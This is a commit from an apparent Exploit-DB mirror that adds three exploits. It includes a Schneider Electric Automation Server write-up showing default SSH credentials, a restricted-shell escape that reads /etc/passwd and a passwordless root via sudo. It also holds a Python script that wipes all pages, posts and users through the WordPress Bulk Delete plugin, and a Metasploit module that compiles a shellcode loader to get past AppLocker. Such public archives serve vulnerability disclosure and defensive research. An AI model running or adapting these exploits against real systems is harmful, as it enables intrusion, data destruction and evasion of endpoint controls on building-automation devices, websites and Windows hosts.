bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-03-04

Browse source 
3 new exploits
This commit is contained in:
Offensive Security 2016-03-04 05:02:58 +00:00
parent 04bd5476ad
commit b761aa35c0
4 changed files with 436 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -35758,3 +35758,6 @@ id,file,description,date,author,platform,type,port
39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
39519,platforms/win32/shellcode/39519.c,"x86 Windows Null-Free Download & Run via WebDAV Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win32,shellcode,0
39520,platforms/win64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win64,local,0
39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80
39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0

Can't render this file because it is too large.

151
platforms/hardware/remote/39522.txt Executable file
View file

@ -0,0 +1,151 @@
*# Exploit Title: [*Schneider Electric SBO / AS Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.schneider-electric.com*] *
*# Versions Reported: [*
Automation Server Series (AS, AS-P), v1.7 and prior
*] *
# CVE-ID: [CVE-2016-2278]
About
Schneider Electrics corporate headquarters is located in Paris, France,
and it maintains offices in more than 100 countries worldwide.
The affected product, Automation Server, is a building automation system
for small and medium-sized buildings. According to Schneider Electric,
Automation Server is deployed in the Commercial Facilities sector.
Schneider Electric estimates that this product is used worldwide.
*Vulnerabilities*
*1. Weak credential management*
CVE-ID: None [ Mitre, CVE? ]
There are two primary users:
a. root - password is not set by default - this is a problem as we will see
later in the vuln findings
- By default, root cannot SSH in.
b. admin - default password is 'admin'
- Anyone can remotely ssh in to the device using default admin/admin login.
The system / application allows a) weak creds to start with, and more
importantly, b) vulnerable versions lacks the mechanism to forcefully have
the user change the initial password on first use or later. This has been
fixed in the latest version.
*2. OS Command Injection*
*CVE-ID*: CVE-2016-2278
*https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
<https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01>*
After logging in to the device over SSH, the 'admin' user - the only
active, administrative user at this point - is provided a restricted shell
(msh), which offers a small set of, application- specific functional
options.
$ ssh <IP> -l admin
Password:
Welcome! (use 'help' to list commands)
admin@box:>
admin@box:> *release*
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212
admin@box:>
admin@box:> help
usage: help [command]
Type 'help [command]' for help on a specific command.
Available commands:
exit - exit this session
ps - report a snapshot of the current processes readlog - read log files
reboot - reboot the system
setip - configure the network interface
setlog - configure the logging
setsnmp - configure the snmp service
setsecurity - configure the security
settime - configure the system time
top - display Linux tasks
uptime - tell how long the system has been running release - tell the os
release details
Attempting to run any different command will give an error message.
However, this restricted shell functionality (msh) can be bypassed to
execute underlying system commands, by appending '| <command>' to any of
the above set of commands:
admin@box:> *uptime | ls*
bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr
etc localization proc share var
At this point, basically you have full (indirect) control over the server.
admin@box:> *uptime | cat /etc/passwd *
root:x:0:0:root:/:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/false
messagebus:x:3:3:messagebus:/sbin:/bin/false
ntp:x:102:102:ntp:/var/empty/ntp:/bin/false
sshd:x:103:103:sshd:/var/empty:/bin/false
app:x:500:500:Linux Application:/:/bin/false
admin:x:1000:1000:Linux User,,,:/:/bin/msh
admin@box:> uptime | cat /etc/group
root:x:0:
wheel:x:1:admin
daemon:x:2:
messagebus:x:3:
adm:x:5:admin
power:x:20:app
serial:x:21:app
cio:x:22:app
lon:x:23:app
daemonsv:x:30:admin,app
utmp:x:100:
lock:x:101:
ntp:x:102:
sshd:x:103:
app:x:500:admin
admin:x:1000:admin
*3. Privilege Escalation / access to superuser 'root'*
CVE-ID: None [ Mitre, CVE? ]
Since this is an administrative user, an attacker can exploit OS command
injection to perform a variety of tasks from msh shell. But isnt it better
to get a root shell instead.!
As observed from Issue 1 above, root does not have a password set, and it
is possible to use 'sudo -i' and become root.
*Note*: sudo is not presented / offered to 'admin' in the set of functional
options available thru msh. It is required for tech guys / legit admins /
SBO admins to manage the AS system and related functionality. Assumption
from SE team is, a low-skilled attacker / regular, unsophisticated,
non-technical user will not be able to figure it out. If someone does
figure it out, he/she will be responsible enough not to go evill.!
admin@box:> *sudo -i*
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
root@box:~> cat /etc/shadow
root:!:16650:0:99999:7:::
sshd:!:1:0:99999:7:::
admin:$6$<hash>:16652:0:99999:7:::
+++++
--
Best Regards,
Karn Ganeshen

134
platforms/php/webapps/39521.txt Executable file
View file

@ -0,0 +1,134 @@
'''
* Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation]
* Discovery Date: 2016-02-10
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://bulkwp.com/
* Software Link: https://wordpress.org/plugins/bulk-delete/
* Version: 5.5.3
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Bulk Delete_ plugin for WordPress suffers from a privilege escalation
vulnerability. Any registered user can exploit the lack of capabilities
checks to perform all administrative tasks provided by the _Bulk Delete_
plugin. Some of these actions, but not all, are:
- `bd_delete_pages_by_status`: deletes all pages by status
- `bd_delete_posts_by_post_type`: deletes all posts by type
- `bd_delete_users_by_meta`: delete all users with a specific pair of
meta name, meta value
Nearly all actions registered by this plugin can be performed from any
user, as long as they passed to a query var named `bd_action` and the
user has a valid account. These actions would normally require
administrative wrights, so we can consider this as a privilege
escalation vulnerability.
PoC
---
The following script will delete all pages, posts and users from the
infected website.
'''
#!/usr/bin/python3
################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
l = requests.post(loginUrl, data=loginPostData)
if l.status_code != 200 or len(l.history) == 0 or
len(l.history[0].cookies) == 0:
print("Couldn't acquire a valid session")
exit(1)
loggedInCookies = l.history[0].cookies
def do_action(action, data):
try:
requests.post(
adminUrl + '?bd_action=' + action,
data=data,
cookies=loggedInCookies,
timeout=30
)
except TimeoutError:
print('Action ' + action + ' timed out')
else:
print('Action ' + action + ' performed')
print('Deleting all pages')
do_action(
'delete_pages_by_status',
{
'smbd_pages_force_delete': 'true',
'smbd_published_pages': 'published_pages',
'smbd_draft_pages': 'draft_pages',
'smbd_pending_pages': 'pending_pages',
'smbd_future_pages': 'future_pages',
'smbd_private_pages': 'private_pages',
}
)
print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
'post',
'page',
'attachment',
'revision',
'nav_menu_item'
]})
print('Deleting all users')
do_action(
'delete_users_by_meta',
{
'smbd_u_meta_key': 'nickname',
'smbd_u_meta_compare': 'LIKE',
'smbd_u_meta_value': '',
}
)
exit(0)
'''
Solution
--------
Upgrade to v5.5.4
Timeline
--------
1. **2016-02-10**: Requested CVE ID
2. **2016-02-10**: Vendor notified through wordpress.org support forums
3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
4. **2016-02-10**: Vendor responded and received details about the issue
5. **2016-02-10**: Vendor verified vulnerability
6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue
'''

148
platforms/windows/local/39523.rb Executable file
View file

@ -0,0 +1,148 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
def initialize(info={})
super(update_info(info,
'Name' => 'AppLocker Execution Prevention Bypass',
'Description' => %q{
This module will generate a .NET service executable on the target and utilise
InstallUtil to run the payload bypassing the AppLocker protection.
Currently only the InstallUtil method is provided, but future methods can be
added easily.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Casey Smith', # Original AppLocker bypass research
'OJ Reeves' # MSF module
],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> 'Aug 3 2015',
'References' =>
[
['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
]
))
register_options([
OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
'INSTALLUTIL', %w(INSTALLUTIL)])])
end
# Run Method for when run command is issued
def exploit
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
end
end
# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
execute_installutil
end
end
def execute_installutil
envs = get_envs('TEMP', 'windir')
dotnet_path = get_dotnet_path(envs['windir'])
print_status("Using .NET path #{dotnet_path}")
cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
installutil_path = "#{dotnet_path}\\InstallUtil.exe"
print_status("Writing payload to #{cs_path}")
write_file(cs_path, generate_csharp_source)
register_files_for_cleanup(cs_path)
print_status("Compiling payload to #{exe_path}")
csc_path = "#{dotnet_path}\\csc.exe"
csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
print_status("Executing payload ...")
vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
register_files_for_cleanup(exe_path)
end
def get_dotnet_path(windir)
base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
paths = dir(base_path).select {|p| p[0] == 'v'}
dotnet_path = nil
paths.reverse.each do |p|
path = "#{base_path}\\#{p}"
if directory?(path) && file?("#{path}\\InstallUtil.exe")
dotnet_path = path
break
end
end
unless dotnet_path
fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
end
dotnet_path
end
def generate_csharp_source
sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
cs = %Q^
using System;
namespace Pop
{
public class Program { public static void Main() { } }
[System.ComponentModel.RunInstaller(true)]
public class Pop : System.Configuration.Install.Installer
{
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
private static UInt32 INFINITE = 0xFFFFFFFF;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
public override void Uninstall(System.Collections.IDictionary s)
{
byte[] sc = new byte[] {#{sc}};
IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
IntPtr id = IntPtr.Zero;
WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
}
}
}
^
cs
end
end